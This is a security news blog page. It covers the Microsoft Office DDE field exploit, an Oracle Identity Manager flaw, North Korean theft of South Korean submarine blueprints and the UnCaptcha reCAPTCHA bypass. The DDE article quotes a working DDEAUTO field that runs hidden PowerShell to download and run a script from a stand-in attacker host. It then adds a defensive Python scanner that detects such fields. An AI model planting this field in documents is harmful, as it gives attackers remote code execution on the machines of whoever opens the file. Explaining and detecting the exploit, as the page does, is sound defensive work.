Hackers Using Unpatched Microsoft Dynamic Data Exchange Exploit

There is a vulnerability in Microsoft Office involving its Dynamic Data Exchange (DDE) protocol. Exploiting it requires “no macros or memory corruption”, and (if correctly implemented) it shows no security warnings and raises no flags with antivirus software. Thousands of applications use the DDE protocol, including MS Word and Excel.

DDE allows two running applications to share data, and can be set to do so either once or whenever new data becomes available. For example, one could use DDE to target a cell in Excel and receive updates whenever that cell is edited, syncing a cell in your own Excel document with the cell in the original document.

The blog post from Sensepost focused on using Microsoft Word and DDE to gain undetected command execution. The exploit is performed by inserting a field into a Word document and then editing the field code behind the error message it produces. The field is edited to contain something like the following:

{DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe"  }

Or, you could do something worse than open the calculator, like this:

{ DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta 
-NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString
('http://evilserver.ninja/pp.ps1');powershell -e $e "}

Basically, you tell Word to execute an automatically updating DDE field, and the field in turn launches the command prompt, which calls your payload. In the proof-of-concept demonstration, they used a PowerShell command to launch an Empire stager as the payload.

Whenever the Word document is opened, it first asks for permission to allow the file to be updated by a linked file. If DDE is something you deal with, this would be nothing unusual. There is then a second prompt, a security warning, because the DDE field asks for access to the command prompt; however, this can be hidden with “proper syntax modification” according to the blog. Then you just have to get the Word file onto the target system, get the target to open the file, and have them click okay on the one prompt that pops up to allow the data to be shared. Boom, payload delivered.

Microsoft was sent this exploit, replicated it, and decided that it was a feature, so it will not be patched anytime soon. Microsoft has also released a Security Advisory regarding various DDE-related vulnerabilities, most of which involve the user changing settings to secure and control Office. This requires the use of the Registry Editor, which, if done incorrectly, can break your computer and require you to reinstall your OS.

This vulnerability is now being exploited by cybercriminals and state-sponsored hackers. Notably, it has been used by the hacking group “Fancy Bear”, which is believed to be affiliated with the Russian government. In recent weeks they have been running a spearphishing campaign themed around the New York terror attack to bait users into opening the malicious documents, infecting their systems with malware. It has also been used against several organizations and companies in various forms.

Since it is a Microsoft process, nothing will stop DDE from running whatever is sent through it. One way to protect yourself is by disabling DDE entirely on your machines. You can also follow Microsoft’s recommendation of using the Registry Editor to secure Office, or you could go into the settings of some of the apps that use DDE and disable automatic updating or receiving updates from other DDE applications. As always, don’t click links or download files from emails unless you are certain that the source is safe.
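A complementary defender-side control is to scan incoming .docx files for DDE/DDEAUTO fields before they reach a user, since the field instruction is plain text inside the document’s XML. The following scanner is an added example written for this post, not code from Sensepost or Microsoft; the sample document it builds is constructed in memory, and the detection joins field instructions that Word may split across several runs (for example “DDE” + “AUTO …”).

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
W = "{%s}" % W_NS
# Matches the DDE and DDEAUTO field names used by the payload shown above.
DDE_PATTERN = re.compile(r"\bDDE(AUTO)?\b", re.IGNORECASE)


def _field_instructions(part_xml: bytes):
    """Yield every field instruction string found in one Word XML part."""
    root = ET.fromstring(part_xml)
    # Simple fields keep the whole instruction in an attribute.
    for fld in root.iter(W + "fldSimple"):
        yield fld.get(W + "instr", "")
    # Complex fields may spread the instruction over several runs,
    # so concatenate all instrText elements of each paragraph.
    for para in root.iter(W + "p"):
        parts = [t.text or "" for t in para.iter(W + "instrText")]
        if parts:
            yield "".join(parts)


def find_dde_fields(docx_bytes: bytes):
    """Return (part name, whitespace-normalised instruction) per DDE field."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        # Headers, footers and footnotes live in their own parts: scan all word/*.xml.
        for name in zf.namelist():
            if name.startswith("word/") and name.endswith(".xml"):
                for instr in _field_instructions(zf.read(name)):
                    if DDE_PATTERN.search(instr):
                        findings.append((name, " ".join(instr.split())))
    return findings


def build_sample_docx(instr_parts):
    """Constructed minimal .docx with one complex field (sample input only)."""
    runs = "".join("<w:r><w:instrText>%s</w:instrText></w:r>" % p for p in instr_parts)
    doc = ('<w:document xmlns:w="%s"><w:body><w:p>'
           '<w:r><w:fldChar w:fldCharType="begin"/></w:r>%s'
           '<w:r><w:fldChar w:fldCharType="end"/></w:r></w:p></w:body></w:document>'
           % (W_NS, runs))
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("word/document.xml", doc)
    return buf.getvalue()
```

Calling `find_dde_fields(build_sample_docx(["DDE", r'AUTO c:\\windows\\system32\\cmd.exe "/k calc.exe"']))` returns the single split-up DDEAUTO field, while an ordinary DATE field returns nothing; for real mail-gateway use, pass the raw bytes of the attachment instead of the constructed sample.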

Daniel Szafran

Article Sources:

Macro-less Code Exec in MSWord (contains demo and proof of concept for the exploit)

Russian ‘Fancy Bear’ Hackers Using (Unpatched) Microsoft Office DDE Exploit

Microsoft Security Advisory 4053440

Google Play Store Fails Vetting Again…

In case you haven’t noticed, I like beating up on the Google Play Store just a bit. More fake apps were released onto the Play Store. Instead of stealing personal information through phony banking apps, attackers are now spamming users with ads through fake WhatsApp messenger lookalikes.

Oracle Identity Manager Hacked through a Critical Flaw

Based in Redwood, California, Oracle Corporation is the largest software company whose primary business is database products. Historically, Oracle has targeted high-end workstations and minicomputers as the server platforms to run its database systems. Its relational database was the first to support the SQL language, which has since become the industry standard.

A vulnerability was found in Oracle’s identity management system. It has been assigned CVE-2017-10151, carries the highest possible CVSS score of 10, and is easy to exploit without any user interaction.

This CVE is due to a security loophole involving a default account that allows an unauthenticated attacker on the same network to compromise Oracle Identity Manager over HTTP.

The full details of this vulnerability have not yet been released by Oracle.

“This vulnerability is remotely exploitable without authentication, i.e., may be exploited over a network without requiring user credentials,” Oracle’s advisory reads.

The easily exploitable vulnerability affects Oracle Identity Manager versions 11.1.1.7, 11.1.1.9, 11.1.2.1.0, 11.1.2.2.0, 11.1.2.3.0 and 12.2.1.3.0.

Oracle has already released patches for all versions of the product affected by this CVE. All users should update to the patched version to close the vulnerability before a hacker has the chance to exploit it.

Justin Palmer

Sources:

https://thehackernews.com/2017/10/oracle-identity-manager.html

https://www.oracle.com/index.html

North Korea Hackers Accused of Stealing Secret Blueprints of South Korea’s Submarine Weapon Systems

North Korean hackers have broken into computer systems in South Korea and stolen classified documents containing blueprints for submarines and warships, it has been alleged. They illegally accessed systems of Daewoo Shipbuilding and stole around 40,000 documents, according to South Korean politician Kyeong Dae-soo. Sixty “classified documents including blueprints and technical data for submarines and vessels equipped with Aegis weapon systems” made their way into North Korean hands.

The breach was discovered by the South Korean defense ministry, according to Kyeong Dae-soo of the main opposition Liberty Korea Party. “We are almost 100 percent certain that North Korean hackers were behind the hacking and stole the company’s sensitive documents,” Kyeong told Reuters. A team investigating the hack concluded that North Korea was behind the attack after reportedly uncovering similarities with other attacks known to have been conducted by North Korean hackers.

South Korea is also in the middle of building a brand new submarine that could potentially launch nuclear missiles. Meanwhile, US intelligence assesses that North Korea has begun construction of a new class of 2,000-ton submarine which Kim Jong-un could use to launch the country’s nuclear missiles. Its existence hasn’t been confirmed yet, but US intelligence sources are closely monitoring the country’s shipyards in order to get an idea of what is happening.

Citations:

http://www.ibtimes.co.uk/north-korea-accused-hacking-stealing-secret-blueprints-south-korean-warships-submarines-1645245

http://www.mirror.co.uk/tech/north-korean-hackers-accused-stealing-11441008

http://www.businessinsider.com/north-korea-stole-submarines-technology-south-korea-2017-10

-Matthew Brown

UnCaptcha Cracks Google ReCaptcha with 85% Accuracy

One of the internet’s favorite ways of verifying that traffic is coming from actual people and not bots is the captcha. Those little boxes with pictures of street signs have proven notoriously difficult for robots to crack, despite steady progress in machine learning on image recognition. Recently, however, researchers at the University of Maryland have figured out a new, easier way to crack these pesky security measures.

Rather than looking at the images provided by Google, their new system, UnCaptcha, uses the audio captcha offered as an accessibility alternative, sidestepping the complexities of image processing.

The program works by passing the audio played by the captcha to several speech-to-text services. It uses Bing Speech Recognition, IBM, and the Google Cloud API, along with phonetic processing to determine exact and near homophones, and plugs its results back into the captcha.

The researchers have been able to achieve about 85% accuracy with this system, which is available on GitHub. Google has noticed the release of this captcha cracker and recently started adding certain bits of spoken text into its audio recordings.

https://www.infosecurity-magazine.com/news/uncaptcha-defeats-google-captcha/

https://www.bleepingcomputer.com/news/technology/uncaptcha-breaks-450-recaptchas-in-under-6-seconds/